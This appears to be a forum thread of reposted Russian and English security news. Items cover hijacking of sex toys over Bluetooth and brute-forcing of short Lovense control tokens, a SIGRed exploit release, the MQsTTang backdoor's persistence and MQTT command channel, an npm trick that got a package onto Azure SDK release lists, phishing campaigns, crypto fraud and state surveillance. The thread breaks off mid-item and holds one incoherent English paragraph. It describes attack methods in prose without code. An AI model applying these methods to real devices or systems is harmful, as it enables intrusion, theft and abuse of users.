При этом информация, обрабатываемая секс-игрушками, состоит из крайне конфиденциальных данных, включая имена людей, их сексуальную ориентацию, пол, список сексуальных партнеров, личные фотографии, видео и так далее. Словом, это настоящий кладезь данных для злоумышленников, например, занимающихся «сексуальным вымогательством» — термин sextortion, образован от слов sex («секс») и extortion («вымогательство»).
Хуже того, подобные IoT-устройства могут быть скомпрометированы и использованы для вредоносных действий, включая нанесения физического вреда пользователю. Такое может произойти, например, при перегреве секс-игрушки.
«И, наконец, что произойдет, если кто-то возьмет под контроль секс-игрушку без согласия пользователя, пока та используется, и станет посылать этому устройству различные команды? Считается ли атака на секс-устройство сексуальным насилием, и может ли подобное привести к обвинениям в сексуальном насилии?», — спрашивают исследователи.
Click to expand...
Чтобы продемонстрировать опасность подобных недостатков безопасности, исследователи провели собственные тесты секс-игрушек Max от Lovense и We-Vibe Jive. Быстро выяснилось, что оба гаджета используют наименее безопасный метод соединения Bluetooth — Just Works.
[](https://xakep.ru/wp- content/uploads/2021/03/342852/Figure-2a_-Discovery-of-sex-toys-available-in- the-immediate-vicinity-through-a-Bluetooth-scanner.png)
Используя фреймворк BtleJuice и два BLE-донгла, эксперты сумели продемонстрировать, как злоумышленник может осуществить атаку типа Man-in-the- Middle, захватить контроль над устройством и перехватить пакеты. Затем хакер может ретранслировать модифицированные пакеты, предварительно изменив настройки, включая, к примеру, режим вибрации и интенсивность или даже внедрив собственные команды.
Хуже того, оказалось, что эндпоинты API, используемые для соединения удаленного партнера с пользователем, применяют токен, который можно подобрать с помощью простого брутфорса.
«Список опций приложения Lovense для удаленного управления включает в себя возможность создания URL-адресов в формате https://api2.lovense.com/c/, где используется комбинация из четырех буквенно-цифровых символов, — гласит отчет. Это позволяет пользователям удаленно управлять девайсами, просто вводя такие URL-адреса в браузер. — Удивительно, но сервер не имеет никакой защиты от брутфорса, хотя здесь используются такие короткие токены с относительно небольшим количеством возможных комбинаций (1 679 616 возможных токенов для приложения, насчитывающего более миллиона загрузок)».
Click to expand...
Также у устройств отсутствуют сквозное шифрование и привязка сертификатов, используемые при получении обновлений прошивки.
«Это чрезвычайно серьезная уязвимость, поскольку она позволяет злоумышленнику осуществить удаленный захват устройств (без согласия или ведома пользователя), ожидающих подключения с помощью активных токенов», — объясняют специалисты.
Click to expand...
Еще прошлым летом исследователи уведомили разработчиков WOW Tech Group и Lovense о проблемах, которые им удалось обнаружить. Уже в августе 2020 года вышла версия 4.4.1 приложения WOW Tech We-Connect, которая содержала исправления для обнаруженных уязвимостей, а также проблемы были устранены и в приложении Lovense с релизом версии 3.8.6.
«Зачастую мобильные приложения, подобные приложениям для управления секс- игрушками, обрабатывают очень ценную информацию о своих пользователях. Крайне важно, чтобы разработчики понимали, как важно тратить время и усилия на разработку и создание безопасных систем, не поддаваясь давлению рынка, который ставит скорость выше безопасности», — резюмируют эксперты.
Click to expand...
Источник: xakep.ru/2021/03/12/sex-in-the-digital-era/
В прошлом году эксперты компании Check Point обнаружили критическую уязвимость в составе Windows DNS Server, получившую кодовое имя SigRed и идентификатор CVE-2020-1350. Уязвимость набрала 10 баллов из 10 возможных по шкале оценки уязвимостей CVSSv3. Такой рейтинг означает, что ошибка крайне проста в использовании, и ее эксплуатация почти не требует технических знаний. Также уязвимость может быть использована для автоматизированных удаленных атак и не требует предварительной аутентификации.
Так как баг существовал в коде 17 лет, проблема представляла опасность для всех версий Windows Server, выходивших с 2003 по 2019 год. Для эксплуатации бага хакер мог отправлять вредоносные DNS-запросы к DNS-серверам Windows, что влекло за собой выполнение произвольного кода и могло привести к компрометации всей инфраструктуры.
Уязвимость была исправлена в прошлом году, в рамках июльского «вторника обновлений».
Теперь ведущий ИБ-специалист компании Grapl Валентина Пальмиотти (Valentina Palmiotti) представила PoC-эксплоит для SIGRed, а также опубликовала подробный отчет о его работе, где она также поясняет, как создавать правила SIEM для обнаружения эксплуатации SIGRed.
__https://twitter.com/x/status/1366800284563963907
«При бережном использовании злоумышленники могут удаленно выполнить код в уязвимой системе и получить права администратора домена, поставив под угрозу всю корпоративную инфраструктуру», — пишет специалистка [в отчете](https://www.graplsecurity.com/post/anatomy-of-an-exploit-rce-with- cve-2020-1350-sigred).
Click to expand...
Эксплоит Пальмиотти был успешно протестирован (1, 2) на непропатченных 64-битных версиях Windows Server 2019, 2016, 2012R2 и 2012. Видеодемонстрацию атаки можно увидеть ниже.
Нужно отметить, что эксплоиты для SIGRed появлялись и ранее, однако те версии были способны лишь спровоцировать отказ в обслуживании (DoS).
Источник: xakep.ru/2021/03/05/sigred-rce/
Китайские хакеры атакуют европейские организации с помощью нового бэкдора MQsTTang.
Проправительственная APT Mustang Panda, также известная как TA416 или Bronze President, представляет собой кибершпионскую группировку, которая осуществляет атаки для кражи данных по всему миру с использованием модифицированных вариантов вредоносного ПО PlugX.
Однако недавно замеченная вредоносная программа-бэкдор MQsTTang не похожа ни на одну ранее известную и позволяет предположить, что хакеры создали ее, дабы избежать обнаружения и скрыть свою причастность к атакам.
Кампанию с MQsTTang обнаружили исследователи ESET в начале января 2023 года, которая до сих пор остается активной.
Атаки в основном ориентированы на правительственные и политические организации в Европе и Азии, причем в первую очередь, на Тайвань и Украину.
Известно, что Mustang Panda и ранее была нацелена на европейские правительственные организации по меньшей мере с 2020 года, но, со слов специалистов, группировка еще больше усилила свою активность в Европе после начала СВО.
ESET характеризует MQsTTang как относительно «простой» бэкдор, который позволяет злоумышленникам удаленно выполнять команды на хосте жертвы.
Он представляет собой своего рода удаленную оболочку без каких-либо элементов, связанных с другими семействами вредоносных программ этой группы. По сути, это одноэтапный бэкдор без каких-либо методов обфускации.
При запуске малварь создает свою копию с аргументом командной строки, которая выполняет различные задачи, например запуск связи C2, создание постоянства и т.д.
Постоянство устанавливается путем добавлением нового ключа реестра в «HKCU\Software\Microsoft\Windows\CurrentVersion\Run», который запускает вредоносное ПО при старте системы. После перезапуска выполняется только задача связи с C2.
Особенностью этого бэкдора является использование протокола MQTT (протокол обмена сообщениями IoT) для связи с сервером управления и контроля. MQTT обеспечивает устойчивость вредоносных программ к удалению C2, скрывает инфраструктуру злоумышленника и снижает вероятность ее обнаружения.
Чтобы остаться незамеченным и избежать обнаружения, MQsTTang проверяет наличие средств отладки или средств мониторинга на центральном компьютере. Если вдруг такие инструменты будут обнаружены, малварь поменяет свое поведение.
В настоящее время нет однозначного мнения, был ли бэкдор MQsTTang разработан для проведения конкретной вредоносной кампании или он останется в арсенале Mustang Panda.
Тем не менее сам факт его наличия говорит об усилении возможностей и поиске новых тактик группировки для проведения новых злонамерных кампаний.
• Source: [https://www.welivesecurity.com/2023...da-latest-backdoor-treads- new-ground-qt-mqtt/](https://www.welivesecurity.com/2023/03/02/mqsttang- mustang-panda-latest-backdoor-treads-new-ground-qt-mqtt/)
Полицейские разыскивают мошенников, которые обманули 57-летнюю жительницу Калининградской области почти на 1 миллион 300 тысяч рублей. Такую сумму женщина вложила в покупку криптовалюты с целью заработка, а вывести средства не смогла. Началось все с рекламы в одной из социальных сетей (прим.: в Инстаграм), призывавшей «заставить деньги работать» и обрести «финансовую независимость», которая при этом еще и маскировалась под предложение реально существующего банка.
Потерпевшая прошла по ссылке и заполнила анкету. Через некоторое время с ней по телефону связался «менеджер», который принялся учить женщину инвестировать в криптовалюту. Он убедил ее зарегистрироваться на интернет-сайте, так называемой «брокерской платформе», и советовал какие операции там выполнять. Сначала калининградка покупала криптовалюту, переводя на электронные кошельки свои деньги. Женщине даже позволили вывести немного вложенных средств, чтобы усыпить бдительность.
Однако потом собеседник повысил ставки и убедил ее играть «по-крупному». Потерпевшая взяла через онлайн приложение банка в кредит сумму, эквивалентную 20 тысячам долларов США, и перевела деньги на указанные ей счета. «Брокерская платформа» исправно рисовала графики снижения и повышения курсов криптовалют, показывала сколько на счету калининградки имеется средств, «прогноз» и получаемую прибыль.
Общение с «брокером» шло до тех пор, пока она не решила вернуть вложенные средства. После требований перевести деньги назад мужчина прекратил связь, хотя до этого очень культурно и вежливо общался, производя впечатление образованного финансового специалиста.
A security researcher was able to add a counterfeit test package to the official list of Microsoft Azure SDK latest releases.
The simple trick if abused by an attacker can give off the impression that their malicious package is part of the Azure SDK suite.
This month security researcher Alex Birsan
demonstrated how
anyone could add their own package to the list of official Azure SDK Latest
Releases.
As of a few days ago, the Azure SDK releases [page showed](http://web.archive.org/web/20210310091257/https://azure.github.io/azure- sdk/releases/latest/all/js.html) the authentic Microsoft Azure SDK releases alongside the mysterious package alexbirsantest.
Azure SDK latest
releases page showed Alex Birsan 's package "alexbirsantest"
Source: BleepingComputer
Additionally, one of the users pointed
out that a GitHub
[commit](https://github.com/Azure/azure-
sdk/commit/70d93176cd2ec7a886a6aa259f97857fca76a1fa) was pushed by the "azure-
sdk" bot and added the alexbirsantest package to the CSV file supposedly
used for populating the Microsoft Azure SDK releases page.
This indicated the bot was somehow tricked into picking up this unofficial test package automatically.
A GitHub commit showed Alex
Birsan 's test package added to the CSV file maintained by Azure
Source: GitHub
Last month, as first reported by BleepingComputer, Alex Birsan could exploit the dependency confusion problem in the open-source ecosystem to ethically hack over 35 big tech firms in a novel supply chain attack, and earn over $130,000 in bug bounties.
However, the researcher has clarified this is not the result of dependency
confusion but rather something much simpler.
The researcher published the alexbirsantest package to npm and further added
the npm account azure-sdk as a
collaborator to his package, by following simple
[instructions](https://docs.npmjs.com/adding-collaborators-to-private-
packages-owned-by-a-user-account) laid out by npm.
In this particular case, the "azure-sdk" accounts used on npm and GitHub appear to be bots configured to pick up any and all npm packages that these accounts were listed as collaborators for.
Although alexbirsantest has since been taken
down, as a Sonatype security
researcher, I was able to obtain a copy of the original npm package from
Sonatype's automated malware detection system archives.
The index.js file in alexbirsantest version 2100.4.2 contains the same
proof-of-concept code as Birsan's previously published dependency confusion
packages, but the package has a disclaimer in multiple places clarifying that
this is "NOT a dependency confusion test."
Contents of the
alexbirsantest npm package that made it to the Azure SDK releases list
Source: BleepingComputer
"I just added a bunch of companies as collaborators to my package to see what
would happen. This was the only interesting result," Birsan told
bleepingcomputer[.]
Even though this event may not have a direct impact on compromising a system's
security, it is still noteworthy.
An adversary being able to add a malicious package with a name similar to
other Azure SDK packages can easily disguise their malware as a part of the
official Azure SDK releases.
If downloaded by an unsuspecting developer or user, this could potentially become the root cause of a software supply chain attack.
After all, the page explicitly says that it contains "Azure library packages published to npm from the azure-sdk account."
As seen by BleepingComputer, Microsoft has now removed the alexbirsantest package from the list of their official Azure SDK latest releases.
Российский гражданин обвинён в манипуляции крипторынком: раскрыты подробности схемы на миллионы долларов
В Бостоне федеральные власти обвинили россиянина, проживающего в Португалии, в крупной схеме по манипуляции рынком криптовалют. 26-летний Алексей Андриунин, основатель и генеральный директор компании Gotbit, был обвинен в мошенничестве с использованием электронных средств связи и заговоре с целью манипуляции рынком. В дополнение к нему, обвинения также предъявлены Gotbit и двум её директорам — Федору Кедрову и Кави Джалили.
Что произошло?
По данным следствия, Gotbit — известная компания «маркетмейкер» в
криптоиндустрии — с 2018 по 2024 годы предлагала услуги манипуляции торговым
объемом криптовалют на заказ. Эти действия создавали видимость высокого спроса
на определённые криптовалюты, искусственно завышая объёмы торгов, чтобы
привлечь внимание к этим активам на популярных ресурсах, таких как
CoinMarketCap, и добиться листинга на крупных криптобиржах.
Схема манипуляции и её масштаб
Следствие утверждает, что Gotbit и её сотрудники, в том числе Джалили
(директор по продажам) и Кедров (директор по маркетмейкингу), предлагали
клиентам услуги по искусственному увеличению торговых объемов. Андриунин
разрабатывал специальный код для так называемой «отмывочной торговли» (wash
trading) и использовал несколько учетных записей для обхода обнаружения на
блокчейне.
Андриунин, как утверждается, вел документацию, фиксируя разницу между «Созданным Объемом» из отмывочных торгов и естественным «Рыночным Объемом». Среди клиентов Gotbit были проекты Saitama и Robo Inu, чье руководство также находится под следствием. Считается, что доходы от таких услуг достигали десятков миллионов долларов, часть из которых Андриунин переводил на свой личный аккаунт в Binance.
Уголовные последствия
По обвинениям, Андриунину и его соратникам грозит до 20 лет тюремного
заключения за мошенничество с использованием электронных средств связи и до 5
лет за заговор с целью манипуляции рынком. Кроме тюремного срока, они могут
быть обязаны выплатить штрафы, а также пройти процедуры конфискации и
возмещения ущерба.
Комментарий прокуратуры и ФБР
И.о. прокурора США Джошуа С. Леви и специальный агент ФБР Джоди Коэн
подчеркнули, что обвинение стало частью крупных усилий по борьбе с финансовыми
преступлениями и мошенничеством в киберпространстве.
Важное замечание: все обвинения на данный момент являются только утверждениями. Подсудимые считаются невиновными до тех пор, пока их вина не будет доказана в суде.
По данным следствия, Gotbit работала с клиентами по всему миру, предоставляя манипуляционные услуги не только в США, но и для международных криптопроектов.
Обвиняемые утверждают, что такие манипуляции могут считаться частью «маркетмейкинга», однако правоохранительные органы США категорически не согласны с этой позицией и рассматривают действия Gotbit как серьёзное финансовое преступление.
Xaкepы из Angel Drainer пoxитили из 128 aдpecoв кpиптoвaлюту нa $400 000
Фишингoвaя гpуппa Angel Drainer укpaлa бoлee $400 000 из 128 кpиптoкoшeлькoв, пpимeнив нoвую тaктику. Aнaлиз пoкaзaл, чтo кибepпpecтупники иcпoльзoвaли oбoзpeвaтeль блoкчeйнa Etherscan, чтoбы зaмacкиpoвaть вpeдoнocный xapaктep cмapт-кoнтpaктa.
B кoмпaнии пo oбecпeчeнию бeзoпacнocти блoкчeйнoв Blockaid cooбщили, чтo aтaкa нaчaлacь утpoм 12 фeвpaля 2024 гoдa. B Angel Drainer paзвepнули вpeдoнocный кoнтpaкт xpaнилищa Safe, в peзультaтe чeгo пoльзoвaтeли пo нeзнaнию aвтopизoвaли тpaнзaкцию Permit2 пo cкoмпpoмeтиpoвaннoму кoнтpaкту, чтo и пpивeлo к кpaжe $40З 000.
Bыбиpaя кoнтpaкт xpaнилищa Safe, в Angel Drainer пытaлиcь вызвaть у пoльзoвaтeлeй лoжнoe чувcтвo бeзoпacнocти. Этo типичнaя улoвкa в cxeмax кpиптoфишингa, пocкoльку Etherscan aвтoмaтичecки пpoвepяeт бeзoпacныe кoнтpaкты. B Blockaid пoдчepкнули, чтo ocнoвнoй мишeнью былo нe xpaнилищe Safe и eгo пoльзoвaтeльcкaя бaзa. Cпeциaлиcты пo бeзoпacнocти нeзaмeдлитeльнo увeдoмили Safe oб aтaкe и oкaзaли пoмoщь в уcтpaнeнии дaльнeйшeгo ущepбa.
Angel Drainer, правда?)
Владелец компании по производству электромобилей Tesla и компании-разработчика мозговых чипов Илон Маск намерен объединить усилия их инженеров, чтобы создать кибертело. Оно позволит вживлять бионические конечности людям с ампутированными руками и ногами.
Илон Маск хочет поручить инженерам своих компаний Tesla и Neuralink в сотрудничестве создавать протезы для людей с ограниченными возможностями, [сообщает](https://fortune.com/2023/07/20/elon-musk-tesla-neuralink-cyborg- body-amputees-incredibly-capable-bionic-man/) Fortune со ссылкой на заявление Маска. Управлять имплантантами будут вживленные в мозг человека чипы.
«Комбинируя имплантат Neuralink и роботизированную руку или ногу для человека с ампутированной конечностью или конечностями, мы сможем создать, по сути, кибертело с невероятными возможностями»,
— заявил Маск инвесторам Tesla.Click to expand...
Он добавил, что в долгосрочной перспективе протез может быть даже лучше биологической конечности.
Тем не менее обе компании еще далеки от того, чтобы воплотить в жизнь эту идею, подчеркивает издание. Tesla приступила к разработке концепции человекоподобного робота в 2021 году. Компания делает первые шаги в создании специальных приводов, позволяющих обеспечить рудиментарное движение конечностей такой машины, сообщает Fortune.
В июне стало известно, что Neuralink начнет проводить первые испытания по вживлению чипа в мозг человека в конце 2023 года. Предприниматель уточнил, что микросхемы планируется имплантировать пациентам с параличом конечностей.
Источник: incrussia.ru
Специалисты некоммерческой организации Consumer Reports [опубликовали](https://digital-lab-wp.consumerreports.org/wp- content/uploads/2021/12/VPN-White-Paper.pdf) технический отчет, в котором рассматриваются политики конфиденциальности и безопасности 16 известных поставщиков VPN. Исследователи провели анализ 51 компаний, но в конечном итоге сосредоточились на наиболее известных поставщиках. Результаты оказались неоднозначны — в документе эксперты высказали серьезные замечания в адрес отрасли, а именно отсутствие прозрачности, ложь в пиар-кампаниях и не всегда безупречные методы обеспечения безопасности. С другой стороны, небольшая группа VPN на самом деле оказалась надежной.
По словам экспертов, VPN-провайдеры часто преувеличивают или делают вводящие в заблуждение заявления об эффективности своих услуг. Потребители часто полагают, что с помощью VPN они могут стать полностью невидимыми в интернете, поскольку компании обещают «непревзойденную анонимность» и возможность «сохранить конфиденциальность просмотра и защитить себя от хакеров и online- отслеживания».
Компании и рекламодатели могут отслеживать пользователей в Сети различными способами, даже если IP-адрес скрыт за виртуальной завесой. Web-сайты часто запрашивают данные, которые могут точно определить географическое местоположение людей, например сети Wi-Fi, местоположение устройства на основе GPS, идентификацию вышек сотовой связи (идентификаторы CDMA или GSM) и пр.
Конфиденциальность пользователей в интернете настолько хороша, насколько хороша кибербезопасность, и, к сожалению, VPN-компании не всегда имеют наилучший послужной список, когда дело доходит до защиты данных клиентов. CR провела исследование с помощью инструмента VPNalyzer команды специалистов из Мичиганского университета. VPNalyzer выявил 19 нарушений безопасности с подключениями VPN, включая перехват трафика и манипуляции с ним.
По мнению CR, с точки зрения методов обеспечения конфиденциальности и безопасности список самых безопасных VPN-провайдеров возглавили: Mullvad, PIA, IVPN и Mozilla VPN. Три из четырех крупнейших компаний (за исключением PIA) провели общедоступные аудиты с привлечением сторонних компаний для проверки своих средств защиты. Отчеты опубликованы на web-сайтах компаний ( [Mullvad](https://mullvad.net/en/blog/2020/6/25/results-available-audit- mullvad-app/) , [PIA](https://www.privateinternetaccess.com/blog/libsodium- audit-results/) , [IVPN](https://www.ivpn.net/blog/ivpn-apps-security-audit- concluded/) и [Mozilla VPN](https://blog.mozilla.org/en/mozilla/news/mozilla- vpn-completes-independent-security-audit-by-cure53/) ) позволяя пользователям самостоятельно ознакомиться с результатами.
На Ставрополье вынесли приговор троим местным жителям. С помощью стилеров они заполучали логи и похищали деньги.
Как рассказали в краевом управлении ФСБ, трое ставропольцев с помощью стилера обеспечения получали сведения о логинах и паролях от электронных почт и криптокошельков. После они похищали у потерпевших деньги.
Грачевский районный суд назначил троим жителям Ставрополья от 1 года и 2 месяцев до 1 года и 6 месяцев условного лишения свободы.
Website's online: 55.007.110 millions [Updated: few days ago].
Should lead to think about what it's happening, and why we need to take a
strong decision towards the continuation of the human mankind.
The results are absolutely reliable, so any justification would be simply a
wrong approach. We all need to take care of this cause, and find
responsability in us to build a safer; better world.
From my own point of view, I'm opened to the solution regarding any problem
refereed in the comments.
I can try to dedicate myself to its solution, but we all need to collaborate.
It's a matter, at least: of the web.
I have many ideas, but without an official approval I can't; and won't render
them in reality as projected.
Don't follow the flame,
believe in our inner dreams.
Роскомнадзор собирается отслеживать переговоры буквально каждого россиянина под предлогом борьбы с так называемыми «серыми» SIM-картами. Для этого он будет требовать у операторов информацию об их абонентах – кому они звонили и когда, а также кто и в какое время звонил им. То же коснется и текстовых сообщений.
Таких полномочий у Роскомнадзора пока нет. Наделить его ими предлагает проект постановления Правительства России, подготовленный Минкомсвязи и получивший название «Об утверждении состава, порядка и сроков предоставления операторами подвижной радиотелефонной связи информации, необходимой для осуществления мониторинга соблюдения операторами связи обязанности по проверке достоверности сведений об абоненте и сведений о пользователях услугами связи абонента – юридического лица либо индивидуального предпринимателя».
Документ был вынесен на обсуждение 16 марта 2021 г. Оно продлится до 5 апреля 2021 г., то есть всего 20 рабочих дней.
Гигантское количество данных
Согласно тексту проекта постановления, Роскомнадзор сможет запрашивать у операторов поистине огромный объем информации об абонентах. В первую очередь это их ФИО, дата рождения, место жительства и данные об удостоверяющем личность документе – например, паспорте, который они предоставляли при заключении договора. Абоненты корпоративных тарифов против своей воли будут делиться с ведомством еще и названием компании, в которой они работают. Все нижеперечисленное тоже касается абонентов обычных и корпоративных тарифных планов.
Наряду с этим Роскомнадзор сможет узнать личный номер телефона абонента и дату заключения договора с оператором связи. Если договор расторгнут, то дата его закрытия тоже будет передана ему.
Роскомнадзор сможет даже отслеживать приблизительное местоположение абонентов в момент совершения вызова, так как, согласно тексту проекта постановления Правительства, операторы будут передавать ему информацию об идентификаторе базовой станции, притом это коснется как вызывающего абонента, так и того, кому он звонит. Вместе с этим он получит информацию о номере вызываемого абонента, а также о дополнительном его номере, на который осуществляется переадресация, если таковой имеется.
В дополнение к перечисленному Роскомнадзор будет получать сведения о факте передачи голоса, текстовых и мультимедийных сообщений, а также об интернет- трафике, даже если для этого использовались промышленные устройства или устройства умного дома (датчики, сенсоры и др.). Весь этот объем данных, согласно проекту постановления, должен будет обновляться ежедневно.
Что задумал Роскомнадзор
Истинная причина заинтересованности Роскомнадзора в тотальной слежке за абонентами мобильной связи на момент публикации материала оставалась неизвестной. В пояснительной записке к проекту постановления Правительства сказано, что она необходима ему для борьбы с «серыми» SIM-картами, то есть теми, которые могут быть оформлены на постороннего человека, или теми, что можно получить бесплатно (операторы нередко раздают SIM-карты для расширения базы пользователей) и начать пользоваться ими вовсе без регистрации.
«В связи с тем, что услуги связи оказываются без фактического заключения договора, пользователи таких модулей могут, в том числе, безнаказанно совершать звонки о ложном минировании. <…> Продолжает также сохраняться ситуация, при которой тысячи граждан становятся жертвами мошенников, которые приобретают идентификационные модули, используя чужие паспортные данные», – сказано в пояснительной записке к документу.
Все это, по мнению авторов проекта, создает «препятствия при проведении оперативно-разыскных действий, так как затрудняют идентификацию абонента». «Мобильные телефоны, зарегистрированные по подложным сведениям, зачастую используются в противоправных целях», – указывают они.
Microsoft заявила, что российская хакерская группа, стоявшая за атакой на SolarWinds, атаковала Агентство США по международному развитию, использовав в этой кампании четыре новых семейства малвари.
Обнаруженные атаки исследователи приписывают русскоязычной хак‑группе APT29 (она же Cozy Bear, Dukes, Nobelium), которая, как считают эксперты, действует под эгидой российских властей.
Исследователи сообщают, что хакеры скомпрометировали учетную запись АМР в Contact Contact, а затем использовали этот аккаунт, чтобы выдавать себя выдавали себя за представителей агентства в фишинговых письмах, которые выглядели аутентичными.
Пример вредоносного письма
В общей сложности злоумышленники разослали такие послания примерно на 3000
учетных записей более чем в 150 различных организациях, включая
правительственные учреждения и организации, занимающиеся международным
развитием, гуманитарной и правозащитной деятельностью. Последняя волна этих
атак началась 28 января 2021 года, а 25 мая заметно усилилась.
Порой фишинговые письма содержали ссылку, при нажатии на которую доставлялся вредоносный файл ICA-declass.iso, использовавшийся для внедрения маяка Cobalt Strike, получившего название NativeZone (Documents.dll). Этот бэкдор может использоваться для постоянного доступа к системе, бокового перемещения, извлечения данных и установки дополнительных вредоносных программ.
Если же базовой операционной системой жертвы была iOS, ее перенаправляляли на другой удаленный сервер с эксплоитом для тогда еще уязвимости нулевого дня CVE-2021-1879. Apple устранила этот недостаток в конце марта, признав, что проблема могла использоваться хакерами.

Также Microsoft опубликовала детали о четырех новых семействах малвари, использованных Nobelium в этих атаках: HTML-вложении под названием EnvyScout, загрузчике BoomBox, загрузчике-бэкдоре NativeZone, а также инструменте VaporRage, предназначенном для загрузки и запуска шелл-кода.
Источник: xakep.ru/2021/05/31/new-nobelium-attack/
ФБР захватило новые домены крупнейшей в мире теневой библиотеки электронных книг Z-Library. Помимо «b-ok.lat», «booksc.me» и «b-ok.as» (впервые обнаруженных TorrentFreak (<https://torrentfreak.com/u-s-hits-z-library-with- new-domain-name-seizures-230505/>) ), список доменов, изъятых в ходе конфискаций, также включает «singlelogin.me», который ранее был основным URL- адресом для входа в систему и регистрации новых учетных записей.
«К сожалению, сегодня был захвачен один из наших основных доменов для входа. Поэтому мы рекомендуем использовать домен «singlelogin.re» для входа в свою учетную запись, а также для регистрации», — говорится в сообщении Z-Library.
Хотя основная панель входа в систему была удалена, она остается доступной в сети Tor и через альтернативный адрес I2P.
После ареста операторов пиратской онлайн-библиотеки Z-Library в начале ноября спецслужбы отключили и изъяли 249 доменов библиотеки , что сделало сайт недоступным в Интернете. Однако, сайт оставался работать через домены «.onion» в сети Tor. Остальные операторы также продолжали отвечать на запросы, что вызвало предположение о том, что двое арестованных были не единственными, кто управлял сайтом.
Z-Library продолжала работать после удаления доменов в сетях Tor и I2P, а также указала для своих пользователей сайты в общедоступном интернете, которые работают на персонализированных доменах разных регистраторов по всему миру. Однако, эти домены не помешали ФБР закрыть главный портал входа «singlelogin.me».
Еще неизвестно, последуют ли новые конфискации доменов, учитывая, что Z-Library по-прежнему управляет несколькими доменами чистой сети. Однако очевидно, что правоохранительные органы США полны решимости закрыть Z-Library и найти людей, которые ею управляют. Z-Library предоставляет бесплатный доступ к обширной базе данных, содержащей почти 12 млн. книг и 84 млн. статей, что делает его одним из самых популярных веб-сайтов в Интернете.
Впервые в истории криптовалют японские власти арестовали банду из 18 мошенников, проанализировав транзакции Monero.
Японские власти проанализировали около 900 транзакций, связанных с отмыванием денег через Monero (XMR), на сумму примерно 100 миллионов йен (670 000 долларов США), что стало результатом преступной деятельности банды мошенников.
Японские власти сообщили местному изданию Nikkei, что это первый случай в истории, когда правоохранительные органы страны использовали транзакции Monero для идентификации группы преступников.
Сотрудники ГУБОПиК вышли на 31-летнего инженера-программиста из Пуховичского района. Установлено, что в октябре 2020 года мужчина разработал и передал администраторам деструктивных телеграм-каналов мобильное приложение.
В задачи программы входило выявление в продаже белорусских товаров для отказа пользователей от их покупки, а также деанонимизация сотрудников правоохранительных органов.
Кроме того, задержанный принимал участие в деструктивном плане «Перамога» и был готов к спонсированию его деятельности.
Мужчина признан подозреваемым по ранее возбужденному уголовному делу за организацию и подготовку действий, грубо нарушающих общественный порядок, либо активное участие в них.
• Video: https://www.belarus.kp.ru/video/embed/865270/
сюда же
Минчанин передал персональные данные не менее 660 работников прокуратуры и Комитета государственного контроля администраторам деструктивных Telegram- каналов. Генеральная прокуратура направила уголовное дело в отношении него в суд, сообщили в управлении взаимодействия со СМИ и редакционной деятельности Генпрокуратуры.
Жителю столицы инкриминированы незаконные действия в отношении информации о частной жизни и персональных данных, пособничество в разжигании иной социальной вражды и розни, а также пособничество в угрозе насилием в отношении должностного лица, выполняющего служебные обязанности, а также иного лица, выполняющего общественный долг.
"Согласно материалам дела минчанин в связи со своей трудовой деятельностью имел доступ к служебной информации, в которой содержались личные и персональные данные конкретных должностных лиц государственных органов. Обвиняемый ознакомился с публикациями ряда Telegram-каналов с персональными данными госслужащих и иных должностных лиц. Осознавая, что деятельность подобных сообществ направлена на дискредитацию действующей власти, разжигание социальной розни, вражды, подстрекательство к преступлениям, он передал администраторам этих ресурсов сведения о частной жизни не менее 660 работников прокуратуры и Комитета государственного контроля. После опубликования личных данных потерпевших в их адрес стали поступать угрозы применения насилия к ним и их близким, а также публичные оскорбления", - рассказали в Генпрокуратуре.
Изучение уголовного дела показало, что расследование по нему проведено всесторонне, полно и объективно, отметили в Генпрокуратуре. Действия обвиняемого верно квалифицированы по чч.1, 2 ст.203-1, ч.6 ст.16 и ч.3 ст.130, ч.6 ст.16 и ч.1 ст.366 УК, что подтверждено совокупностью собранных доказательств. Избранную ранее меру пресечения в виде заключения под стражу, направляя дело в суд, оставили без изменения.
• Source: [https://www.prokuratura.gov.by/ru/m...tratoram-destruktivnykh- telegram-kanalov-gen/](https://www.prokuratura.gov.by/ru/media/novosti/nadzor- za-resheniyami-po-ugolovnym-i-grazhdanskim-delam/peredal-personalnye-dannye- ne-menee-660-grazhdan-administratoram-destruktivnykh-telegram-kanalov-gen/)
Хакеры атаковали краудфандинговую платформу DAO Maker. По данным аналитиков PeckShield, неизвестные вывели с платформы более $7 млн в стейблкоинах USD Coin (USDC).
__https://twitter.com/x/status/1425778230968135684
Злоумышленники вывели депозиты некоторых пользователей DAO Maker в USDC и конвертировали их в Ethereum. Эти данные подтверждает обозреватель Etherscan, согласно которому на якобы принадлежащем хакерам адресе находится более 2261 ETH (~$7 млн по курсу на момент написания).
По данным журналиста Колина Ву, инцидент затронул 9000-10 000 счетов. Стейблкоины могли конвертировать в ETH, чтобы не дать возможности эмитенту USDC — консорциуму Centre — заморозить активы.
__https://twitter.com/x/status/1425779888653361154
В Telegram-канале DAO Maker администрация проекта сообщила, что в курсе
«проблемы с депозитами». Пользователей заверили, что инцидент затронул
исключительно депозитарный смарт-контракт — токены DAO и активы в стейкинге
находятся в безопасности.
t.me/daomaker/316539
В течение дня пользователи неоднократно сообщали о пропаже депозитов. Представитель проекта Пол Уджа (Paul Ujah) попросил воздержаться от спекуляций на тему взлома депозитарного контракта. Администрация канала отключила возможность оставлять в нем сообщения.

Данные: Telegram-канал DAO Maker.
На фоне этой информации токен DAO подешевел более чем на 15% (на бирже
KuCoin). На момент написания актив торгуется вблизи $1,67.

Часовой график DAO/USDT биржи KuCoin. Данные: TradingView.
Ранее межсетевой протокол Poly Network подвергся атаке на блокчейны Ethereum,
Binance Smart Chain и Polygon. Совокупный ущерб составил $611 млн в различных
криптовалютах. Часть похищенных средств, например в Tether (USDT), удалось
заблокировать.
Напомним, стоящий за атакой хакер заявил о намерении вернуть активы. Эксперты предположили, что одной из причин для возмещения средств стало то, что неизвестный засветил персональные данные.
12 августа взломщик вернул все активы, похищенные из сетей Polygon и Binance Smart Chain.

[ Неизвестные вывели с платформы DAO Maker более $7 млн в USD Coin
](https://forklog.com/neizvestnye-vyveli-s-platformy-dao-maker-bolee-7-mln- v-usd-coin/)
Хакеры атаковали краудфандинговую платформу DAO Maker. По данным аналитиков PeckShield, неизвестные вывели с платформы более $7 млн в стейблкоинах USD Coin (USDC). Апдейт: Команда DAO Maker подтвердила взлом, который произошел примерно в 4:00 МСК. Хакер получил доступ к одному из кошельков с...
 forklog.com
Click to expand...
Даже спустя четыре месяца после первого появления Lu0bot — нового семейства вредоносных программ — сообщество специалистов в области кибербезопасности до сих пор пытается выяснить, для чего этот зловред был создан, какова его основная задача.
